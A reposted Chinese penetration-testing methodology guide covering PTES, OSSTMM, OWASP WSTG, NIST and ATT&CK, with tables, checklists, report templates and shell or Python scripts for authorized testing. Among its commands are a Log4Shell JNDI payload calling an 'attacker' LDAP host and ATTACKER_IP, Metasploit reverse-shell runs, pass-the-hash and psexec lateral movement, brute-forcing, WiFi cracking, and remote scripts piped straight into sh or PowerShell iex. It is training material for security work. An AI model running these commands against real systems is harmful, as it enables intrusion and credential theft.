网安蟹佬霸头像
关注

渗透测试方法论实战:从PTES到OSSTMM全流程指南(2026最新版,附实战脚本与Checklist)

【提示】 本文所有技术内容仅用于授权测试、安全学习和合规防御研究。未经授权对任何系统进行渗透测试属于违法行为,作者及平台不承担任何法律责任。请确保在获得书面授权后开展所有测试活动,并严格遵守当地法律法规(如《网络安全法》《数据安全法》《个人信息保护法》等)。在这里插入图片描述

1. 渗透测试方法论概述与价值

渗透测试(Penetration Testing,简称 Pentest)是通过模拟攻击者的技术手段,对目标系统进行安全评估的过程。方法论的价值在于将零散的攻击技术体系化、流程化,确保测试覆盖全面、结果可复现、结论可度量。

一篇合格的安全评估离不开标准框架的支撑。当前业界主流的方法论包括 PTES、OSSTMM、OWASP Testing Guide、NIST SP 800-115 以及 MITRE ATT&CK 评估框架。下面我们逐一展开,并给出在不同场景下的选择决策表。

2. 渗透测试标准框架详解

2.1 PTES(Penetration Testing Execution Standard)

PTES 是社区维护的渗透测试执行标准,将整个测试生命周期划分为七个阶段,是工程化落地最广泛的参考框架。

阶段英文名核心任务关键产出
前期交互Pre-Engagement Interactions确定范围、授权、报价、ROESOW、ROE、授权书
情报收集Intelligence GatheringOSINT、主动侦察、被动侦察资产清单、攻击面地图
威胁建模Threat Modeling资产优先级、攻击路径规划威胁模型文档
漏洞分析Vulnerability Analysis扫描、验证、去重、分类漏洞清单
漏洞利用ExploitationPoC 验证、利用执行、成果固化利用证据、截图
后渗透Post Exploitation提权、横向移动、数据提取、维持后渗透报告、影响链
报告Reporting分级报告、修复建议、复测计划最终报告、管理层摘要

2.2 OSSTMM 3.0 概述

OSSTMM(Open Source Security Testing Methodology Manual)由 ISECOM 维护,强调可度量、可审计、通道分类的科学化评估。

  • 安全测试开源方法论:定义统一的测试项与评估流程,不依赖工具厂商
  • 通道分类:将测试对象划分为 Human、Physical、Wireless、Telecommunications、Data Networks 五大通道
  • 评估指标:以 RAV(Risk Assessment Value)量化安全态势,输出可对比的度量值
通道类型测试重点评估指标
Human人员安全意识、社工风险认证合规率
Physical物理门禁、监控、设施物理控制有效性
WirelessWiFi、蓝牙、NFC、无线 IDS信号暴露面
Telecommunications电话、VoIP、传真通道加密强度
Data Networks主机、服务、应用、数据RAV 评分

2.3 OWASP Testing Guide v4.2 概述

OWASP WSTG v4.2 是 Web 应用渗透测试的事实标准,将测试分为以下分类。

分类测试重点示例测试项
信息收集架构、技术栈、攻击面WAF 识别、JS 分析
配置与部署管理服务器配置、错误处理目录列举、旧备份
身份认证登录、口令、找回机制暴力破解、弱口令
会话管理会话令牌、失效机制会话固定、超时
授权访问控制、越权水平越权、垂直越权
业务逻辑流程绕过、参数篡改并发、顺序绕过
客户端XSS、CSRF、CORSDOM XSS、CSRF

2.4 NIST SP 800-115 概述

NIST SP 800-115 是美国国家标准技术研究所发布的技术指南,面向政府与企业提供规划、执行、报告的完整流程,强调合规与可审计性,其四阶段为:规划、发现、攻击、报告。

2.5 MITRE ATT&CK 评估框架

MITRE ATT&CK 提供攻击者行为知识库,将渗透测试与红队评估映射到具体战术与技术,便于评估检测覆盖率和防守成熟度。

战术阶段渗透测试对应
Reconnaissance侦察被动信息收集
Initial Access初始访问外部打点
Execution执行漏洞利用
Persistence持久化权限维持
Privilege Escalation提权后渗透
Lateral Movement横向移动内网渗透
Exfiltration数据外传数据提取

2.6 各标准对比表

标准适用范围深度广度认证
PTES全类型渗透测试无官方认证
OSSTMM 3.0合规度量评估极高OSSTMM 认证审计师
OWASP WSTG v4.2Web 应用测试极高OWASP 认证
NIST SP 800-115政府/企业合规NIST 相关认证
MITRE ATT&CK红队/检测评估ATT&CK 评估

2.7 方法论选择决策表

场景推荐框架理由
Web 应用安全评估OWASP WSTG + PTES覆盖 Web 分类,结合 PTES 报告
网络与基础设施PTES + NIST 800-115流程规范,合规可审计
合规度量OSSTMM 3.0通道分类与 RAV 可量化
红队评估PTES + MITRE ATT&CK映射 TTPs,评估检测覆盖
移动应用OWASP MASVS + PTES移动专用测试 + 流程报告

3. 前期交互与授权

前期交互决定了整个测试的合法性与边界,是最容易被忽略却最关键的环节。

3.1 渗透测试类型分类表

类型信息披露测试视角难度典型场景
黑盒无任何信息完全外部攻击者外部安全验证
白盒全部源码与架构内部审计视角深度安全审计
灰盒部分信息(账号、架构)混合视角中高业务逻辑测试

3.2 范围定义表

维度内容示例备注
目标IP 段、域名、App、API明确资产清单
时间2026-09-01 至 2026-09-07含维护窗口
深度扫描+利用+后渗透不可越界的动作
限制禁止 DoS、禁止数据删除红线约束
授权人CTO 签字法律效力

3.3 授权与法律文件

  • SOW(工作说明书):明确测试范围、交付物、时间表
  • ROE(交战规则):约束可执行与禁止行为
  • 保密协议(NDA):保护客户数据
  • 授权书:客户书面授权,含联系人、应急流程

3.4 报价与资源评估

项目评估要素报价参考
资产数量IP/域名/应用数按规模阶梯
测试深度扫描/利用/后渗透深度递增
人员投入初级/中级/高级人天计费
报告交付标准报告/复测附加费用

3.5 时间线规划与风险变更管理

阶段时长占比关键风险变更预案
前期交互10%范围模糊变更申请单
信息收集15%资产漂移动态更新清单
漏洞分析20%误报高人工验证
漏洞利用25%业务中断立即暂停与通报
后渗透15%数据泄露风险加密存储证据
报告15%修复建议落地难联合评审

3.6 前期交互模板

项目名称:XX系统2026年度渗透测试
授权人:XXX(CTO)
测试范围:192.168.1.0/24、*.example.com、App v3.2
测试类型:灰盒
测试周期:2026-09-01 至 2026-09-07
限制条款:禁止 DoS、禁止删除/篡改生产数据
紧急联系人:张三 138-XXXX-XXXX
交付物:渗透测试报告、复测报告、漏洞清单

【提示】 授权书必须由目标资产所有方书面签字,明确授权人、范围、时间、限制条款与紧急联系人。口头授权无效。

4. 信息收集与侦察

信息收集是渗透测试的地基,决定了后续攻击面的广度。

4.1 被动信息收集表

类别方法典型工具/来源
OSINT企业公开信息、招聘、泄露Google、GitHub、Shodan
DNS域名解析、历史记录、Zone Transferdig、SecurityTrails、ViewDNS
搜索引擎Google Dork、子域名、敏感文件Google、Bing、Fofa
社交媒体员工邮箱、组织架构LinkedIn、微博
企业信息工商、备案、证书透明度ICP 备案、crt.sh

4.2 主动信息收集表

类别方法典型工具
端口扫描TCP/UDP、 SYN、全连接nmap、masscan、rustscan
服务识别Banner、指纹、版本nmap -sV、finger
Web 指纹CMS、框架、中间件wappalyzer、whatweb
目录扫描路径、备份、敏感文件dirsearch、ffuf、gobuster
子域名爆破、证书、被动subfinder、amass

4.3 信息收集工具集表

工具用途典型命令
nmap端口/服务扫描nmap -sS -sV -p- target
masscan高速端口扫描masscan -p1-65535 --rate=10000 target
dirsearch目录扫描dirsearch -u https://target -w wordlist.txt
subfinder子域名发现subfinder -d example.com -all
wappalyzer技术栈识别浏览器插件/CLI
theHarvester邮箱/域名收集theHarvester -d example.com -b all

4.4 侦察策略与优先级

  1. 被动收集优先于主动扫描,避免过早暴露
  2. 先外部资产后内部资产
  3. 先低交互探测(DNS、证书)后高交互扫描
  4. 对生产系统使用低速率与分时段策略

4.5 完整信息收集流程与脚本

#!/bin/bash
# 被动信息收集脚本示例(仅用于授权测试)
DOMAIN="example.com"

# 子域名收集
subfinder -d $DOMAIN -all -o subs.txt
amass enum -d $DOMAIN -o amass_subs.txt
cat subs.txt amass_subs.txt | sort -u > all_subs.txt

# 存活探测
cat all_subs.txt | httprobe -c 50 > live_subs.txt

# 端口扫描(低速率)
nmap -sS -sV -T2 --top-ports 1000 -iL live_subs.txt -oA nmap_results

# 目录扫描
while read url; do
  dirsearch -u $url -w common.txt -o "dirsearch_$(echo $url | md5sum | cut -c1-8).txt"
done < live_subs.txt

# 证书透明度查询
curl -s "https://crt.sh/?q=%.$DOMAIN&output=json" | jq -r '.[].name_value' | sort -u > crt_subs.txt

5. 威胁建模

威胁建模在信息收集与漏洞分析之间承上启下,用于识别高价值资产与攻击路径。

5.1 威胁建模方法论表

方法论核心适用场景
STRIDE六类威胁分类通用设计评估
Attack Tree攻击树根节点拆解关键资产防护
DREAD风险评分排序漏洞优先级
PASTA七步风险建模业务对齐评估

STRIDE 六类威胁:Spoofing(仿冒)、Tampering(篡改)、Repudiation(抵赖)、Information Disclosure(信息泄露)、Denial of Service(拒绝服务)、Elevation of Privilege(提权)。

5.2 攻击面分析与资产优先级

资产类型暴露面优先级理由
对外 Web 应用公网可访问攻击入口
数据库内网数据核心
域控内网极高权限中枢
员工终端邮件/VPN钓鱼入口
物联网关边界横向跳板

5.3 攻击路径规划

典型路径示例:外部 Web 漏洞 → Web Shell → 内网信息收集 → 域内横向 → 域控 → 全域数据提取。

5.4 威胁建模工具

工具特点适用
Threat Modeler自动化、企业级大型项目
Microsoft TMT微软官方、STRIDEWindows 环境
OWASP Threat Dragon开源、跨平台Web 应用

5.5 完整威胁建模示例

资产:OA 系统(Java + MySQL + Linux)
威胁(STRIDE):
  S 仿冒:弱口令、会话固定
  T 篡改:文件上传覆盖配置
  R 抵赖:操作日志缺失
  I 泄露:SQL 注入、目录列举
  D 拒绝:登录接口无限流
  E 提权:越权访问管理后台
攻击路径:
  外部 → 文件上传 → WebShell → 内网 → 数据库 → 数据外传
优先级:I 泄露 > E 提权 > S 仿冒 > T 篡改 > D 拒绝 > R 抵赖

6. 漏洞分析

漏洞分析阶段将扫描与人工验证结合,输出可信赖的漏洞清单。

6.1 漏洞扫描策略表

策略目的适用误报率
全量扫描全面发现初次评估
针对性扫描聚焦高危复测、专项
验证扫描去伪存真交付前

6.2 漏洞扫描工具对比表

工具类型特点授权
Nessus主机漏扫插件丰富、报告友好商业
OpenVAS主机漏扫开源、社区维护开源
Nexpose主机漏扫集成 Metasploit商业
Qualys云端漏扫SaaS、持续监控商业
AcunetixWeb 漏扫Web 专精商业
Burp SuiteWeb 代理人工深度测试商业/社区

6.3 漏洞验证与去重

  • 对扫描结果按唯一键(资产+漏洞类型+参数)去重
  • 人工复现确认误报,记录 PoC
  • 对同一根因的多个表象合并为一个根因项

6.4 误报分析

误报原因识别方法处置
版本指纹不准手动确认版本标注排除
修补未生效验证补丁状态复测确认
环境差异同环境复现标注环境

6.5 漏洞分类与优先级评估表

维度含义示例
CVSS基础评分 0-109.8 严重
EPSS被利用概率0.95 高概率
业务影响资产价值与损失核心数据库为极高

【提示】 CVSS 高不等于必须立刻修,应结合 EPSS(被利用概率)与业务影响综合排序。一个 CVSS 6.5 但 EPSS 0.9 的漏洞,优先级往往高于 CVSS 9.0 但 EPSS 0.01 的漏洞。

6.6 完整漏洞分析流程

# Nessus 批量扫描导出与分析示例
nessuscli scan export --format csv --scan-id 123 -o scan.csv

# 使用 nuclei 进行针对性验证
nuclei -l live_subs.txt -t cves/2026/ -severity high,critical -o nuclei_high.txt

# 漏洞去重与优先级排序(Python 示例)
python3 - <<'PY'
import csv, json
seen = {}
with open('scan.csv') as f:
    for row in csv.DictReader(f):
        key = (row['host'], row['cve'], row['port'])
        if key not in seen:
            seen[key] = row
out = sorted(seen.values(), key=lambda r: float(r.get('cvss','0')), reverse=True)
json.dump(out, open('vulns_sorted.json','w'), indent=2, ensure_ascii=False)
print(f"去重后漏洞数: {len(out)}")
PY

7. 漏洞利用实战

漏洞利用是验证漏洞真实危害的关键环节,必须在授权范围内执行。

7.1 漏洞利用方法论

步骤任务产出
验证确认漏洞存在PoC 确认
PoC获取/编写利用代码可执行 PoC
适配针对目标环境调整适配后的 payload
执行在授权窗口执行利用证据
验证成果确认影响范围影响记录

7.2 常见漏洞利用表

类型漏洞利用要点
Web 漏洞SQL 注入、XSS、文件上传、SSRF参数污染、绕过 WAF
服务漏洞RCE、反序列化、弱口令版本对应 PoC
配置漏洞默认凭据、目录可写、匿名访问枚举与组合利用
逻辑漏洞越权、并发、支付绕过流程篡改

7.3 漏洞利用工具集

工具用途典型用法
Metasploit综合利用框架use exploit/…; set RHOSTS; exploit
sqlmapSQL 注入自动化sqlmap -u “url?id=1” --batch --dbs
nuclei模板化 PoC 扫描nuclei -t cves/ -l targets.txt
searchsploit漏洞 PoC 检索searchsploit apache 2.4

7.4 漏洞利用流程与文档

漏洞编号:VULN-2026-001
漏洞名称:Apache Log4j RCE
目标:192.168.1.10:8443
PoC 来源:searchsploit log4j
适配说明:目标为 Windows,使用 JNDI LDAP 回链
执行时间:2026-09-02 14:00(授权窗口)
执行命令:java -jar JNDIExploit.jar -i ATTACKER_IP
结果:获得 SYSTEM 权限 Shell
影响:可完全控制目标主机,存在横向风险

7.5 完整漏洞利用记录模板

# Metasploit 利用记录示例
msf6 > use exploit/multi/http/log4shell_header_injection
msf6 > set RHOSTS 192.168.1.10
msf6 > set RPORT 8443
msf6 > set SSL true
msf6 > set LHOST 10.0.0.5
msf6 > set LPORT 4444
msf6 > set TARGET 0
msf6 > exploit
# 记录 session、权限、后续动作
sessions -l
sessions -i 1
getuid
sysinfo

【提示】 所有利用动作必须在授权时间窗口内执行,并完整记录命令、参数、时间与结果,作为报告证据链。对生产业务的高危利用应先与客户确认维护窗口。

8. 后渗透与权限维持

后渗透阶段评估漏洞被利用后的真实业务影响,是体现深度价值的关键。

8.1 后渗透方法论表

阶段任务关键产出
信息收集主机、网络、凭据、数据内网拓扑
权限提升内核/服务/配置提权root/SYSTEM
横向移动跨主机、跨域新主机控制
数据提取加密外传、留证影响证据
权限维持持久化后门恢复访问能力
痕迹清理清理日志与残留合规退出

8.2 权限提升路径表

系统常见路径检查点
Linux内核漏洞、SUID、Sudo 配置、Cron、PATH 劫持linpeas、pspy
Windows内核漏洞、服务路径未引用、令牌 impersonate、AlwaysInstallElevatedwinpeas、PowerUp

8.3 横向移动路径表

技术原理典型工具
Pass-the-HashNTLM 哈希复用CrackMapExec、Impacket
Pass-the-TicketKerberos 票据复用Rubeus、kekeo
SSH 密钥私钥复用ssh -i
WMI远程管理wmiexec.py
PsExec远程执行Impacket psexec.py

8.4 数据提取方法表

方法通道检测难度
加密通道HTTPS/TLS C2
隐写术图片/文件嵌入
DNS 隧道DNS 查询外传
HTTP 隧道隧道封装

8.5 权限维持技术表

技术系统检测难度
服务Windows/Linux
计划任务Windows/Linux
Web 后门跨平台
Rootkit内核级极高

8.6 完整后渗透流程

# Linux 提权信息收集(仅授权测试)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# 检查 sudo 权限
sudo -l

# 检查 SUID
find / -perm -4000 -type f 2>/dev/null

# Windows 提权信息收集
# 在目标执行:
powershell -c "iex(iwr -UseBasicParsing https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEAS.ps1)"

# 横向移动示例(Impacket,需授权)
python3 psexec.py DOMAIN/user:[email protected]
python3 wmiexec.py DOMAIN/user:[email protected]

# Pass-the-Hash
crackmapexec smb 192.168.1.0/24 -u administrator -H Aad3b4b5e...

【提示】 后渗透阶段的痕迹清理不是掩盖攻击,而是合规退出,确保测试结束后客户环境恢复原状。所有获取的数据必须加密存储并在交付后销毁。

9. 报告编写与交付

报告是渗透测试的最终交付物,决定了客户能否落地修复。

9.1 渗透测试报告结构表

章节内容受众
执行摘要总体风险、关键发现、建议管理层
测试范围与方法资产、类型、框架全员
漏洞描述标题、描述、PoC、截图技术团队
影响分析CVSS、业务影响管理层+技术
修复建议短期/中期/长期技术团队
附录工具清单、原始数据运维团队

9.2 报告分级表

级别受众重点
管理层报告CIO/CSO/CISO风险、合规、投入产出
技术报告研发/安全漏洞细节、PoC、修复
运维报告运维/SRE配置修复、验证步骤

9.3 漏洞描述模板

【漏洞标题】Apache Log4j 远程代码执行(CVE-2021-44228)
【漏洞描述】目标系统使用存在缺陷的 Log4j 组件,攻击者可通过构造 JNDI
请求触发远程代码执行。
【影响范围】192.168.1.10:8443(OA 系统)
【CVSS 评分】10.0(严重)
【PoC】
  curl -H 'X-Api-Version: ${jndi:ldap://attacker/Exploit}' \
       https://192.168.1.10:8443/api
【截图】见附录 Fig-001
【修复建议】升级 Log4j 至 2.17.1+,并移除 JNDI 查找功能。

9.4 修复优先级矩阵表

级别定义响应时间示例
立即严重且可被远程利用24 小时RCE、未授权访问核心
高危且有公开 PoC7 天SQL 注入、提权
中危或需前置条件30 天XSS、信息泄露
低危或影响有限90 天配置加固建议

9.5 完整报告模板

# XX 系统 2026 年度渗透测试报告

## 一、执行摘要
本次测试共发现漏洞 23 个,其中严重 3、高危 7、中危 9、低危 4。
整体风险等级:高。建议优先修复 3 个严重漏洞。

## 二、测试范围与方法
资产:OA、CRM、API 网关
类型:灰盒
框架:PTES + OWASP WSTG v4.2

## 三、漏洞清单(见附录 A)

## 四、影响分析
严重漏洞可导致核心数据泄露与内网失陷。

## 五、修复建议(按优先级)

## 六、附录
工具清单、原始扫描数据、PoC 录屏

10. Web 应用渗透测试流程

10.1 OWASP Testing Guide v4.2 测试分类表

分类测试项数重点
信息收集9架构、WAF、JS
配置管理10目录、错误处理、备份
身份认证11暴力破解、找回、多因素
会话管理7令牌、失效、固定
授权6水平/垂直越权
业务逻辑6流程绕过、并发
客户端11XSS、CSRF、CORS

10.2 Web 测试 checklist 表(精选)

序号测试项期望结果
1登录暴力破解防护失败次数锁定
2默认/弱口令检测不存在弱口令
3SQL 注入(GET/POST)参数化查询
4XSS(反射/存储/DOM)输出编码
5文件上传类型校验白名单校验
6SSRF出网限制
7目录列举禁止无目录列表
8会话令牌随机性高熵
9会话超时闲置失效
10水平越权权限校验
11垂直越权角色校验
12CSRF Token防伪令牌
13CORS 配置白名单域
14敏感数据传输加密TLS 1.2+
15错误信息泄露无堆栈泄露
16API 速率限制限流
17JWT 签名校验强算法
18反向钩子/点击劫持X-Frame-Options
19旧备份文件已清理
20JS 敏感信息无密钥硬编码

10.3 Web 测试工具集

工具用途备注
Burp Suite代理、扫描、RepeaterWeb 测试主力
OWASP ZAP开源代理扫描免费
nuclei模板化漏扫批量
sqlmapSQL 注入自动化脱库
XSStrikeXSS 检测生成 payload

10.4 完整 Web 应用测试流程

# 1. Burp 被动爬取,建立站点地图
# 2. 主动扫描
# 3. sqlmap 批量注入测试
sqlmap -g "site:example.com" --batch --smart

# 4. nuclei 模板扫描
nuclei -u https://target -t cves/ -t exposures/ -severity medium,high,critical

# 5. 目录与文件发现
ffuf -w wordlist.txt -u https://target/FUZZ -mc 200,301,302,401,403

# 6. 子域名与关联资产
subfinder -d example.com -all | httprobe | nuclei -t takeovers/

11. 网络渗透测试流程

11.1 网络渗透测试分类表

类型视角重点
外部测试公网攻击者边界设备、暴露服务
内部测试内网攻击者横向移动、域安全
无线测试近场攻击者WiFi、蓝牙

11.2 网络测试 checklist 表

序号测试项工具
1端口扫描(TCP/UDP)nmap
2服务版本识别nmap -sV
3主机漏洞扫描Nessus/OpenVAS
4弱口令爆破hydra
5SMB 枚举enum4linux
6域信息收集BloodHound
7横向移动验证Impacket
8防火墙规则探测nmap --script firewall-bypass
9VPN 配置审计检查配置
10网络设备默认凭据设备清单核对

11.3 网络测试工具集

工具用途
nmap端口与服务扫描
Nessus漏洞扫描
Metasploit漏洞利用
CrackMapExec内网批量枚举与利用
Impacket协议级操作套件
BloodHound域内攻击路径分析

11.4 完整网络渗透测试流程

# 外部发现与扫描
nmap -sS -Pn -p- -T4 --min-rate 1000 203.0.113.0/24 -oA external_scan

# 内网信息收集
crackmapexec smb 192.168.1.0/24 -u '' -p '' --shares
crackmapexec smb 192.168.1.0/24 -u user -p pass --rid

# 域信息收集与路径分析
bloodhound-python -d domain.local -u user -p pass -c All
# 在 BloodHund 中分析最短攻击路径

# 常见服务弱口令
hydra -L users.txt -P pass.txt ssh://192.168.1.0/24 -t 4
hydra -L users.txt -P pass.txt rdp://192.168.1.0/24 -t 4

# 漏洞利用(授权后)
msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue; \
  set RHOSTS 192.168.1.20; set LHOST 10.0.0.5; exploit"

12. 社会工程学测试流程

12.1 社工测试范围与授权

社会工程学测试必须获得明确书面授权,包含可使用的诱饵模板、目标群体、回退机制与不可触碰的红线(如不得针对特定个人、不得造成业务停摆)。

12.2 社工测试方法表

方法形式目标
钓鱼邮件/短信/语音凭据窃取
电话冒充 IT/高管信息套取
物理门禁尾随、桌面搜索物理边界
USB诱饵设备投放主机控制

12.3 社工测试 checklist 表

序号测试项
1钓鱼邮件模拟(含培训链接)
2仿冒登录页凭据收集
3电话冒充 IT 索要凭据
4物理尾随进入办公区
5USB 诱饵投放
6桌面敏感文件检查
7员工安全意识问答

12.4 风险评估与缓解

指标计算目标
钓鱼点击率点击人数/发送人数<10%
凭据提交率提交/发送<5%
上报率上报/发送>50%

【提示】 社工测试结果应作为安全意识培训的输入,不得用于惩罚员工。测试完成后必须向所有目标发送说明与培训材料。

13. 无线网络渗透测试

13.1 无线测试分类表

类型协议重点
WiFi802.11加密、认证、客户端
蓝牙BLE配对、服务枚举
NFCISO 14443中继、克隆

13.2 WiFi 测试 checklist 表

序号测试项
1AP 发现与信号测绘
2加密强度(WPA2/3)
3认证方式(PSK/802.1X)
4客户端隔离
5蜜罐 AP 检测
6管理帧保护(PMF)
7默认凭据检查
8信号泄漏范围

13.3 无线测试工具集

工具用途
aircrack-ng抓包与破解套件
reaverWPS 破解
wifite自动化 WiFi 测试
kismet被动发现与测绘
bettercap中间人与欺骗

13.4 完整无线测试流程

# 监听模式切换(需授权环境)
airmon-ng start wlan0

# 发现与抓取握手包
airodump-ng wlan0mon
airodump-ng -c 6 --bypass AP_BSSID -w capture wlan0mon

# 离线字典破解(仅授权测试)
aircrack-ng -w wordlist.txt capture-01.cap

# WPS 测试
reaver -i wlan0mon -b AP_BSSID -vv

# 蜜罐检测
kismet -c wlan0mon

14. 移动应用渗透测试

14.1 移动测试分类表

平台文件格式重点
AndroidAPK/AAB反编译、组件、存储
iOSIPA越狱、Keychain、ATS

14.2 移动测试 checklist 表

序号测试项
1反编译与代码审查
2本地存储敏感数据
3通信加密与证书校验
4硬编码密钥/令牌
5认证与会话管理
6组件导出与越权(Android)
7WebView 漏洞
8深度链接劫持
9客户端校验绕过
10第三方 SDK 隐私合规

14.3 移动测试工具集

工具用途
Frida动态注入与 Hook
objectionFrida 封装,移动测试利器
JADXAPK 反编译
apktoolAPK 资源解包
MobSF移动应用自动化扫描

14.4 完整移动测试流程

# Android 反编译
apktool d app.apk -o app_src
jadx -d app_java app.apk

# 动态分析(需 root/越狱环境)
frida -U -l hook.js -f com.example.app
objection -g com.example.app explore

# 自动化扫描
mobsfscan app_src/

# iOS 关键检查
# 1. Keychain 数据:keychain-dumper
# 2. ATS 配置:Info.plist 审查
# 3. 二进制保护:checksec / iShart

15. 红队评估与渗透测试

15.1 红队评估 vs 渗透测试对比表

维度渗透测试红队评估
目标发现漏洞验证整体防御
范围预定义资产不预设,以目标达成为准
时长数天至数周数周至数月
隐蔽性可见隐蔽、模拟真实 APT
蓝队参与已知测试蓝队不知情(紫队协调)
产出漏洞报告检测覆盖率与响应评估

15.2 红队评估流程表

阶段任务产出
目标定义确定夺旗目标ROE
侦察OSINT、资产测绘入口清单
初始访问钓鱼、边界利用、供应链首个据点
内网渗透提权、横向、域控目标达成
目标达成夺旗(如数据库/域控)证据
报告TTPs、检测差距、改进评估报告

15.3 红队 TTPs 映射(MITRE ATT&CK)

战术示例技术ATT&CK ID
Initial Access鱼叉钓鱼T1566
Execution计划任务T1053
Persistence服务创建T1543
Privilege Escalation令牌操纵T1134
Lateral MovementPtHT1550
Exfiltration加密通道T1041

15.4 红队评估 checklist 表

序号检查项
1目标与红线已书面确认
2C2 基础设施搭建并伪装
3鱼叉钓鱼载荷免杀
4初始据点建立
5内网横向路径规划
6检测盲区记录
7目标达成证据固化
8蓝队响应评估

15.5 完整红队评估方案

项目:XX 集团 2026 红队评估
目标:核心数据库访问凭据获取
周期:4 周(含隐蔽期)
范围:不预设,以达成目标为准
禁止:破坏可用性、对外泄露数据
C2:域名伪装 + CDN 隧道
载荷:定制免杀 + 计划任务持久化
评估重点:边界检测、内网横向告警、响应时效

16. 自动化与持续安全

16.1 渗透测试自动化脚本编写(Python)

#!/usr/bin/env python3
# 自动化资产发现与初筛脚本(仅用于授权测试)
import subprocess, json, ipaddress
from concurrent.futures import ThreadPoolExecutor, as_completed

TARGETS = ["192.168.1.0/24"]
REPORT = {}

def expand_cidr(cidr):
    return [str(ip) for ip in ipaddress.ip_network(cidr, strict=False).hosts()]

def scan_host(ip):
    try:
        r = subprocess.run(
            ["nmap", "-sS", "-sV", "-T4", "--top-ports", "100", ip],
            capture_output=True, text=True, timeout=120
        )
        return ip, r.stdout
    except subprocess.TimeoutExpired:
        return ip, "TIMEOUT"

hosts = []
for c in TARGETS:
    hosts.extend(expand_cidr(c))

with ThreadPoolExecutor(max_workers=20) as ex:
    futures = {ex.submit(scan_host, h): h for h in hosts}
    for f in as_completed(futures):
        ip, out = f.result()
        if "open" in out:
            REPORT[ip] = out

with open("auto_recon.json", "w") as f:
    json.dump(REPORT, f, indent=2, ensure_ascii=False)
print(f"存活开放端口主机: {len(REPORT)}")

16.2 持续安全评估方案

机制频率工具
定期漏扫每周Nessus/OpenVAS
持续资产监控实时攻击面管理平台
代码安全扫描每次提交SAST/SCA
DAST 扫描每日OWASP ZAP
红蓝对抗每季度紫队演练

16.3 DevSecOps 中的渗透测试集成

阶段集成点工具示例
编码IDE 插件、预提交扫描SonarLint、Semgrep
构建SAST、SCASonarQube、Trivy
测试DAST、fuzzOWASP ZAP、ffuf
部署基线扫描、镜像扫描Trivy、kube-bench
运营持续监控、威胁狩猎SIEM、EDR

16.4 漏洞管理生命周期

发现 → 分类 → 评估优先级 → 分派修复 → 验证复测 → 关闭归档
              ↑__________________________|
                     未通过则回到修复

16.5 完整自动化方案

# CI/CD 安全门禁示例(GitLab CI 风格)
stages:
  - sast
  - sca
  - dast
  - gate

sast:
  stage: sast
  script:
    - semgrep --config=auto --json -o sast.json .
  artifacts:
    paths: [sast.json]

sca:
  stage: sca
  script:
    - trivy fs --exit-code 1 --severity HIGH,CRITICAL .

dast:
  stage: dast
  script:
    - zap-baseline.py -t https://staging.example.com
  rules:
    - if: $CI_COMMIT_BRANCH == "main"

gate:
  stage: gate
  script:
    - python3 vuln_gate.py --max-critical 0 --max-high 2
  allow_failure: false

17. 总结与参考资源

17.1 渗透测试 checklist 总表(精选汇总)

类别检查项数重点
前期交互10授权、范围、ROE
信息收集15被动+主动
威胁建模10STRIDE、攻击路径
漏洞分析15扫描、验证、去重
漏洞利用12PoC、适配、证据
后渗透12提权、横向、维持
报告8分级、修复矩阵
Web 测试20OWASP WSTG
网络测试10端口、服务、域
社工7钓鱼、物理
无线8WiFi、蓝牙
移动10反编译、存储
红队8TTPs、检测差距
自动化10CI/CD、持续评估
合计155+全流程覆盖

17.2 工具速查表

阶段首选工具备选
信息收集nmap、subfindermasscan、amass
漏洞扫描Nessus、nucleiOpenVAS、Burp
漏洞利用Metasploit、sqlmapsearchsploit
后渗透Impacket、PEASS-ngCrackMapExec
WebBurp SuiteOWASP ZAP
移动Frida、objectionMobSF
无线aircrack-ngwifite
报告自建模板Dradis、Faraday

17.3 认证资源表

认证颁发定位难度
OSCPOffensive Security渗透入门实战
OSCEOffensive Security高级渗透极高
OSEPOffensive Security绕过与利用极高
CRTOZero-Point Security红队操作
CISSPISC2安全管理中高

17.4 参考资源列表

资源来源用途
PTESpentest-standard.org渗透流程标准
OSSTMM 3.isecom.org度量化评估
OWASP WSTG v4.2owasp.orgWeb 测试指南
NIST SP 800-115nist.gov技术指南
MITRE ATT&CKattack.mitre.org攻击行为知识库
Exploit-DBexploit-db.comPoC 仓库
CVSS Calculatorfirst.org漏洞评分

17.5 合规声明

本文所述渗透测试方法论与技术内容仅适用于以下场景:已获得书面授权的安全评估、企业内部安全建设与防御研究、合规的安全培训与学习。任何未经授权的扫描、探测、利用行为均属违法,可能违反《网络安全法》《数据安全法》《个人信息保护法》及相关刑法条款。使用者须自行承担一切法律责任,作者与发布平台不承担任何连带责任。

【提示】 安全技术的根本目的是提升防御能力。掌握攻击方法是为了更好地防守,请始终在合法合规的框架内使用这些知识,做一名负责任的安全从业者。在这里插入图片描述

作者:CSDN 网络安全博客专家 | 更新日期:2026-08-24 | 标签:渗透测试、PTES、OSSTMM、OWASP、红队评估、DevSecOps

转载自 CSDN-专业IT技术社区

原文链接:https://blog.csdn.net/xlb8888888/article/details/164027625

文章来源转载

评论

赞0

评论列表

微信小程序
QQ小程序

关于作者

点赞数:0
关注数:0
粉丝:0
文章:0
关注标签:0
加入于:--